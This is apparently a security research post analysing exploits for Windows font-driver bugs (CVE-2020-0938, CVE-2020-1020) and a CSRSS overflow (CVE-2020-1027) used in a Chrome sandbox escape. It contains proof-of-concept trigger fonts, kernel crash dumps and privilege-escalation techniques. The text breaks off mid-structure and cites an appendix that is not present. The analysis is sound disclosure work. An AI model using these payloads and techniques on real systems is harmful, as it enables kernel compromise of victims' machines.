In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.

1. Font vulnerabilities on Windows ≤ 8.1 (CVE-2020-0938, CVE-2020-1020)


The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).

On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).

Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.

Font bug #1

The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:

int ParseBlendVToHOrigin(void *arg) {
  Fixed16_16 *ptrs[2];
  Fixed16_16 values[2];

  // numMasters can be as large as 16, but both arrays hold only 2 elements.
  for (int i = 0; i < g_font->numMasters; i++) {
    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];
  }

  for (int i = 0; i < 2; i++) {
    int values_read = GetOpenFixedArray(values, g_font->numMasters);
    if (values_read != g_font->numMasters) {
      return -8;
    }

    for (int num = 0; num < g_font->numMasters; num++) {
      ptrs[num][i] = values[num];
    }
  }

  return 0;
}


In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0–16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:


| Offset | Contents |
| --- | --- |
| RSP + 0x30 | ptrs[0] |
| RSP + 0x38 | ptrs[1] |
| RSP + 0x40 | saved RDI |
| RSP + 0x48 | return address |
| RSP + 0x50 | values[0 .. 1] |
| RSP + 0x58 | saved RBX |
| RSP + 0x60 | saved RSI |


In this layout, the user-controlled local arrays (ptrs at RSP + 0x30 and values at RSP + 0x50) surround internal control-flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.

After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.
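The aliasing follows directly from the frame offsets in the table above. The sketch below, with hypothetical helper names, computes where each out-of-bounds index lands, rebuilds the pointer that ptrs[4] or ptrs[5] holds, and converts PostScript reals to the Fixed16_16 bit patterns that the sample font below relies on. Rounding to the nearest 1/65536 is an assumption about atmfd’s number parser; it does reproduce the values quoted in this post.

```c
#include <stdint.h>

#define PTRS_BASE   0x30   /* Fixed16_16 *ptrs[2]: 8 bytes per element */
#define VALUES_BASE 0x50   /* Fixed16_16 values[2]: 4 bytes per element */

/* RSP-relative offset touched by ptrs[i] or values[j], in or out of bounds. */
int ptr_slot(int i)   { return PTRS_BASE + 8 * i; }
int value_slot(int j) { return VALUES_BASE + 4 * j; }

/* Index j such that ptrs[i] shares its 8 bytes with values[j] and
 * values[j + 1], or -1 if ptrs[i] lies below the values array. */
int aliased_value_index(int i) {
    int off = ptr_slot(i) - VALUES_BASE;
    return off >= 0 ? off / 4 : -1;
}

/* Pointer held by ptrs[i] (i >= 4) once values[] is read from the font:
 * on little-endian x64, values[j] supplies the low 32 bits. */
uint64_t write_target(const uint32_t *values, int i) {
    int j = aliased_value_index(i);
    return ((uint64_t)values[j + 1] << 32) | values[j];
}

/* PostScript real -> Fixed16_16 bit pattern, rounding to nearest (assumed). */
uint32_t to_fixed16_16(double x) {
    double scaled = x * 65536.0;
    int64_t r = (int64_t)(scaled >= 0 ? scaled + 0.5 : scaled - 0.5);
    return (uint32_t)r;    /* wraps modulo 2^32, e.g. -1 -> 0xFFFFFFFF */
}
```

For example, 16705.25490 and -0.00001 become 0x41414141 and 0xFFFFFFFF, so ptrs[4] ends up pointing to 0xffffffff41414141, while ptrs[2] and ptrs[3] land on the saved RDI and the return address.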

A proof-of-concept test case is easily crafted by taking any existing Type 1 font and recompiling it (e.g. with the detype1 and type1 utilities from AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:

~%!PS-AdobeFont-1.0: Test 001.001
dict begin
/FontInfo begin
/FullName (Test) def
end
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] def
/WeightVector [0 0 0 0 0] def
/Private begin
/Blend begin
/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]
end
end
currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile


The /WeightVector line sets numMasters to 5, and the /VToHOrigin line triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by placing the PFB and PFM files in the same directory and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:


Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.

Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory
        address.
Arg4: 0000000000000002, (reserved)

TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141
rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000
 r8=0000000000000000  r9=000000000000000e r10=0000000000000000
r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po cy

fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????

Resetting default scope
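The decimal numbers in the /VToHOrigin array are 16.16 fixed-point encodings of the 32-bit values that end up in registers. A minimal sketch of the conversion, assuming round-to-nearest (an assumption about atmfd.dll, but consistent with the rax and rcx values in the dump above), shows how the literals map to the dwords; the function names are hypothetical. With truncation toward zero instead, -0.00001 would become 0 rather than 0xffffffff, so the rounding mode matters for the high half of the target address.

```c
#include <assert.h>
#include <stdint.h>

/* Converts a decimal PostScript number to a 16.16 fixed-point dword,
   assuming round-to-nearest (not confirmed for atmfd.dll). */
uint32_t to_fixed16_16(double x) {
  double scaled = x * 65536.0;
  int64_t rounded = (int64_t)(scaled < 0 ? scaled - 0.5 : scaled + 0.5);
  assert(rounded >= INT32_MIN && rounded <= INT32_MAX);
  return (uint32_t)rounded; /* negative values wrap to two's complement */
}

/* Rebuilds the 64-bit pointer formed by two adjacent 32-bit values,
   low dword first, as on little-endian x64. */
uint64_t pointer_from_values(uint32_t low, uint32_t high) {
  return ((uint64_t)high << 32) | low;
}
```

Under this assumption, 16705.25490 and -0.00001 combine into the pointer 0xffffffff41414141, and 16962.25882 becomes the value 0x42424242.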

Font bug #2

The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudocode:

int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);
  }

  for (int i = 0; i < num_master; i++) {
    procs->BlendDesignPositions(i, &values[i]);
  }

  return 0;
}

The bug was simple. The first for() loop enforced no upper bound on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out of bounds at &values[16], &values[17], and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed-point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-contiguous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, although the SetBlendDesignPositions function itself was compiled with a /GS cookie, it was possible to skip over the cookie and overwrite another return address higher up the call chain to hijack the control flow.
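Because each row of values holds 15 four-byte entries, values[n][k] sits (15n + k) * 4 bytes past the start of the array, and an empty [] advances n without writing anything. The following sketch (the helper name written_offsets is hypothetical) replays that arithmetic for a given sequence of array lengths, such as the 22 empty arrays followed by six values in the trigger font below.

```c
#include <assert.h>
#include <stddef.h>

#define ROW_ELEMS 15u                    /* Fixed16_16 values[16][15] */
#define ELEM_SIZE 4u                     /* sizeof(Fixed16_16) */
#define ROW_SIZE (ROW_ELEMS * ELEM_SIZE) /* 60 bytes per row */

/* Replays the unbounded loop: lengths[n] is the number of values in the
   n-th bracketed array. Stores the byte offset (relative to
   &values[0][0]) of every 32-bit write into out and returns the count. */
size_t written_offsets(const unsigned *lengths, size_t num_arrays,
                       size_t *out, size_t out_cap) {
  size_t n = 0;
  for (size_t row = 0; row < num_arrays; row++) {
    assert(lengths[row] <= ROW_ELEMS); /* at most 15 values per array */
    for (unsigned k = 0; k < lengths[row]; k++) {
      assert(n < out_cap);
      out[n++] = row * ROW_SIZE + k * ELEM_SIZE;
    }
  }
  return n;
}
```

For that input, the writes land at offsets 0x528 through 0x53c, i.e. values[22][0..5], well past the 960-byte array. Which saved return address those offsets hit depends on the stack layout of the particular build, which this model does not capture.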

To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:

~%!PS-AdobeFont-1.0: Test 001.001
dict begin
/FontInfo begin
/FullName (Test) def
end
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] def
/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]
/Private begin
/Blend begin
end
end
currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile


In the /BlendDesignPositions line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xffffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:


Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.

Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.
Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory
        address.
Arg4: 0000000000000002, (reserved)

TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000
rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000
rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002
 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000
r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
ffffffff`41414141 ??              ???

Resetting default scope


According to our analysis, the font exploit supported the following Windows versions:

  • Windows 8.1 (NT 6.3)
  • Windows 8 (NT 6.2)
  • Windows 7 (NT 6.1)
  • Windows Vista (NT 6.0)

When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice to set up a minimal 8-byte bootstrap stub at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, which is mapped as RWX in these old versions of Windows, so KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first-stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here) and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.

Things get more complicated on Windows 8.1, where the session space is no longer executable:

0: kd> !pte fffff90000000000
PXE at FFFFF6FB7DBEDF90
contains 0000000115879863
pfn 115879    ---DA--KWEV

PPE at FFFFF6FB7DBF2000
contains 0000000115878863
pfn 115878    ---DA--KWEV

PDE at FFFFF6FB7E400000
contains 0000000115877863
pfn 115877    ---DA--KWEV

PTE at FFFFF6FC80000000
contains 8000000115976863
pfn 115976    ---DA--KW-V

As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address – the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did – it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.
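Because the page tables sit at a fixed address on Windows 8.1, the entry mapping any virtual address can be computed directly from that address. The sketch below assumes the PTE base 0xFFFFF68000000000, which is consistent with the !pte output above; the PDE, PPE and PXE bases follow from applying the same self-map formula to the PTE base. The helper names are hypothetical, and later Windows versions randomize these bases, so the constants only illustrate the Windows 8.1 case.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Assumed Windows 8.1 x64 self-map bases (fixed, not randomized). */
#define PTE_BASE 0xFFFFF68000000000ULL
#define PDE_BASE 0xFFFFF6FB40000000ULL
#define PPE_BASE 0xFFFFF6FB7DA00000ULL
#define PXE_BASE 0xFFFFF6FB7DBED000ULL

#define PTE_NX (1ULL << 63) /* execute-disable bit of an x64 entry */

/* Each level drops 9 more index bits; entries are 8 bytes wide. */
uint64_t pte_address(uint64_t va) { return PTE_BASE + ((va >> 9) & 0x7FFFFFFFF8ULL); }
uint64_t pde_address(uint64_t va) { return PDE_BASE + ((va >> 18) & 0x3FFFFFF8ULL); }
uint64_t ppe_address(uint64_t va) { return PPE_BASE + ((va >> 27) & 0x1FFFF8ULL); }
uint64_t pxe_address(uint64_t va) { return PXE_BASE + ((va >> 36) & 0xFF8ULL); }

/* A 32-bit write of 0 to pte_address(va) + 4 zeroes bits 32..63 of the
   entry. That clears only NX if bits 32..62 (which include the upper
   physical frame number bits) were already zero. */
bool zeroing_high_dword_only_clears_nx(uint64_t pte) {
  return ((pte & ~PTE_NX) >> 32) == 0;
}
```

pte_address(0xfffff78000000000) + 4 evaluates to 0xfffff6fbc0000004, the address written by the exploit. The last helper is only a model of the side effects of that write; it says nothing about the actual PTE contents of the shared user data page.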

Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to the next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with an ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.

The fixes

We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.

Since both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:

int ParseBlendVToHOrigin(void *arg) {
  Fixed16_16 *ptrs[16];
  Fixed16_16 values[16];

  if (g_font->numMasters > 0x10) {
    return -4;
  }

  ...
}

In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:

int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }

    if (num_master >= 16) {
      return -4;
    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);
  }

  ...
}

2. CSRSS issue on Windows 10 (CVE-2020-1027)


The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.

csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.

The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:

NTSTATUS CsrClientCallServer(
    PCSR_API_MSG ApiMessage,
    PVOID CaptureBuffer,
    ULONG ApiNumber,
    LONG DataLength);

The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.

The reader can refer to this series of posts for a detailed description of the CSRSS internals.

One of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"
      version="" processorArchitecture="x86"/>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"
          version="" processorArchitecture="x86"/>
    </dependentAssembly>
  </dependency>
</assembly>

The bug

The vulnerability was found in the routine sxssrv!BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.

The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

BaseSrvSxsCreateActivationContext starts by validating the string parameters:

for (i = 0; i < 6; ++i) {
  if (StringField = StringFields[i]) {
    Length = StringField->Length;
    if (Length && !StringField->Buffer ||
        Length > StringField->MaximumLength || Length & 1)
      return 0xC000000D;
    if (StringField->Buffer) {
      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,
                                    Length + 2, 1)) {
        DbgPrintEx(0x33, 0,
                   "SXS: Validation of message buffer 0x%lx failed.\n"
                   " Message:%p\n"
                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",
                   i, ApiMessage, StringField, StringField->Length,
                   StringField->MaximumLength, StringField->Buffer);
        return 0xC000000D;
      }
      CharCount = StringField->Length >> 1;
      if (StringField->Buffer[CharCount] &&
          StringField->Buffer[CharCount - 1])
        return 0xC000000D;
    }
  }
}

CsrValidateMessageBuffer is declared as follows:

BOOLEAN CsrValidateMessageBuffer(
    PCSR_API_MSG ApiMessage,
    PVOID* Buffer,
    ULONG ElementCount,
    ULONG ElementSize);

This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.
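The gap between the two length fields can be illustrated with a simplified bounds check. In this sketch, validate_range and the capture_buffer structure are hypothetical stand-ins that only approximate the three checks listed above. The numbers echo the Appendix A reproducer: MODULE has 28 characters, so its Length is 56 bytes, and the reproducer later overwrites MaximumLength with 0x8000. Placing the string at the very end of the buffer is an assumption made for the illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of a capture buffer occupying [base, base + size). */
struct capture_buffer {
  uintptr_t base;
  size_t size;
};

/* Approximates the three checks described for CsrValidateMessageBuffer:
   the pointer is inside the buffer, count * elem_size does not overflow,
   and the range does not run past the end of the buffer. */
bool validate_range(const struct capture_buffer *cb, uintptr_t ptr,
                    size_t count, size_t elem_size) {
  assert(cb->size > 0);
  if (ptr < cb->base || ptr - cb->base >= cb->size)
    return false;
  if (elem_size != 0 && count > SIZE_MAX / elem_size)
    return false;
  size_t room = cb->size - (ptr - cb->base);
  return count * elem_size <= room;
}
```

Validating with Length + 2 (58 bytes) succeeds for such a string, while the same check with the attacker-chosen MaximumLength of 0x8000 would fail; that second check is simply never made.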

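As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be reused as an output parameter. The affected code path runs from BaseSrvSxsCreateActivationContext through BaseSrvSxsCreateActivationContextFromStructEx and sxs!SxsGenerateActivationContext, and eventually reaches the XML parser callback sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity.
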
When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:

BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;
if (BufferCapacity) {
  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;
  GenActCtxParams.ApplicationNameBuffer =
      CreateCtxParams->ApplicationName.Buffer;
} else {
  GenActCtxParams.ApplicationNameCapacity = 60;
  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);
  if (!StringBuffer) {
    Status = 0xC0000017;
    goto error;
  }
  GenActCtxParams.ApplicationNameBuffer = StringBuffer;
}

Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:

Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);
if (Context) {
  ...
} else {
  ...
  goto error;
}

if (GenActCtxParams->ApplicationNameBuffer &&
    GenActCtxParams->ApplicationNameCapacity) {
  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;
  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;
}

Ultimately, sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy in a way that can write past the end of the capture buffer:

IdentityNameBuffer = 0;
IdentityNameLength = 0;

if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,
                                           &IdentityNameBuffer,
                                           &IdentityNameLength)) {
  CallSiteInfo = off_16506FA20;
  goto error;
}

if (IdentityNameLength &&
    IdentityNameLength < Context->ApplicationNameCapacity) {
  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,
         2 * IdentityNameLength + 2);
  Context->ApplicationNameLength = IdentityNameLength;
} else {
  *Context->ApplicationNameBuffer = 0;
  Context->ApplicationNameLength = 0;
}

The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.
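To put numbers on the overflow, the sketch below follows the two listings above using values from the Appendix A reproducer, which overwrites ApplicationName.MaximumLength with 0x8000 and replaces the '@' in the manifest with 0x2000 'A' characters. It assumes the parser reports the identity name length in WCHARs; the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Capacity in WCHARs derived from the unaudited MaximumLength (in bytes),
   as in BaseSrvSxsCreateActivationContextFromStructEx. */
uint32_t capacity_chars(uint16_t maximum_length) {
  return maximum_length >> 1;
}

/* Number of bytes the memcpy in the listing copies for an identity name
   of name_len WCHARs; 0 means the else branch runs instead. */
uint32_t copy_bytes(uint32_t name_len, uint32_t capacity) {
  if (name_len != 0 && name_len < capacity)
    return 2 * name_len + 2; /* includes the terminating NUL WCHAR */
  return 0;
}
```

With MaximumLength = 0x8000 the capacity check allows a 0x4002-byte copy into a string for which only Length + 2 = 58 bytes were validated. With an honest MaximumLength of 58, the same name would fail the check and nothing would be copied.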


Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.

As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.

The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:

  • Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.

  • csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the “local” and “remote” addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.
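Because the client knows the delta, it can prepare fake structures in the shared mapping whose pointers are only valid from csrss.exe’s point of view. A minimal sketch with hypothetical names, assuming remote = local + delta (the sign convention is an assumption), links a set of fake nodes into a circular list, the shape a LIST_ENTRY chain takes:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical fake object stored in the shared section. */
struct fake_node {
  uint64_t next; /* pointer as seen from csrss.exe */
  uint64_t value;
};

/* Client view -> server view, assuming remote = local + delta. */
uint64_t local_to_remote(const void *local, uint64_t delta) {
  return (uint64_t)(uintptr_t)local + delta;
}

/* Links nodes[0..count) into a circular list whose links are valid in
   the server's address space rather than the client's. */
void link_for_server(struct fake_node *nodes, size_t count, uint64_t delta) {
  assert(count > 0);
  for (size_t i = 0; i < count; i++)
    nodes[i].next = local_to_remote(&nodes[(i + 1) % count], delta);
}
```

The client never dereferences these links itself; they are meant to be followed only by code running inside csrss.exe.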

The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard (CFG), which makes it significantly more difficult to jump into a code-reuse gadget chain via an indirect function call. The attacker chose to exploit CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:

1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB". The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.

2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.

3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:

typedef struct _LDR_MODULE {
  LIST_ENTRY InLoadOrderModuleList;
  LIST_ENTRY InMemoryOrderModuleList;
  LIST_ENTRY InInitializationOrderModuleList;
  PVOID BaseAddress;
  PVOID EntryPoint;
  ULONG SizeOfImage;
  UNICODE_STRING FullDllName;
  UNICODE_STRING BaseDllName;
  ULONG Flags;
  SHORT LoadCount;
